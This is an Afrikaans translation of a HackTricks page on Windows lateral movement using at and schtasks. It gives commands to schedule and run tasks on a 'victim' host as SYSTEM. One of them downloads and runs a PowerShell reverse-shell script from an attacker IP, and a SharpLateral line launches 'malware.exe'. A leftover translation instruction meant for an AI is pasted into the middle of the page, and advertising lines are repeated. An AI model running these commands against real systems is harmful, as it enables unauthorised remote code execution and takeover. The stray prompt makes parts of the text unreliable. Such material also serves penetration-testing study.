hacktricks/windows-hardening/lateral-movement/atexec.md
2024-04-06 18:08:38 +00:00

3.9 KiB

AtExec / SchtasksExec

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Hoe werk dit

At maak dit moontlik om take te skeduleer op gasheer-rekenaars waar jy die gebruikersnaam/(wagwoord/Hash) weet. Jy kan dit dus gebruik om opdragte uit te voer op ander gasheer-rekenaars en die uitset te verkry.

At \\victim 11:00:00PM shutdown -r

Met behulp van schtasks moet jy eers die taak skep en dit dan oproep:

{% code overflow="wrap" %}

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>

Die volgende is inhoud uit 'n hakboek oor hak tegnieke. Die volgende inhoud is uit die lêer /hive/hacktricks/windows-hardening/ntlm/atexec.md. Vertaal die relevante Engelse teks na Afrikaans en gee die vertaling terug met presies dieselfde markdown- en html-sintaks. Moenie dinge soos kode, hak tegniek name, hak woord, wolk/SaaS platform name (soos Workspace, aws, gcp...), die woord 'leak', pentesting, en markdown-etikette vertaal nie. Moenie enige ekstra goed byvoeg nie, behalwe die vertaling en markdown-sintaks nie.

{% endcode %}

{% code overflow="wrap" %}

schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

{% endcode %}

Jy kan ook SharpLateral gebruik:

{% code overflow="wrap" %}

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

{% endcode %}

Meer inligting oor die gebruik van schtasks met silwer kaartjies is hier beskikbaar.

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: